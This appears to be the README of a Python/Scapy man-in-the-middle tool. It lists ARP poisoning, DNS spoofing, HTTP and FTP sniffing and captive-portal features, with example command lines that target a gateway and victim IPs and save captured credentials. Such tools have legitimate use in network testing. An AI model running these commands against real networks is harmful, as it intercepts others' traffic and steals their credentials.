Tool developed in Python 3 using Scapy for MITM attacks
Project Structure | Installation | Configuring | Examples
mitm.py
├── include
| ├── arppoison.py
| ├── ftp_sniff.py
| └── http_sniff.py
├── requirements.txt
└── mitm.py
- ARP Poisoning
- FTP Sniffing
- HTTP Sniffing
- DNS Spoofing
- Captive Portal
To learn how to install the script, see the wiki Installation
To configure the hosts for DNS Spoofing attacks, you need to change the config/hosts.json, following these instructions:
{
"kali.ada.": "192.168.1.105",
"test.root.": "192.168.1.105"
}
Set the key name as the host, and the value as the IP to be redirected. And remember to add the '.' at the end.
- Poisoning the ARP and executing DNS Spoofing
python3 mitm.py --arp --dns --gateway 192.168.1.1 --targets 192.168.1.106/192.168.1.104
Remember to change the
config/hosts.json
file
- Sniffing all http requests
python3 mitm.py --http -v
All requests will be saved at
files
directory
- Sniffing all FTP credentials
python3 mitm.py --ftp -v
All credentials will be saved at
files
directory
- Enable Captive Portal
python3 mitm.py --arp --dns --captive --gateway 192.168.1.1 --targets 192.168.1.106
Redirects all requests to your captive portal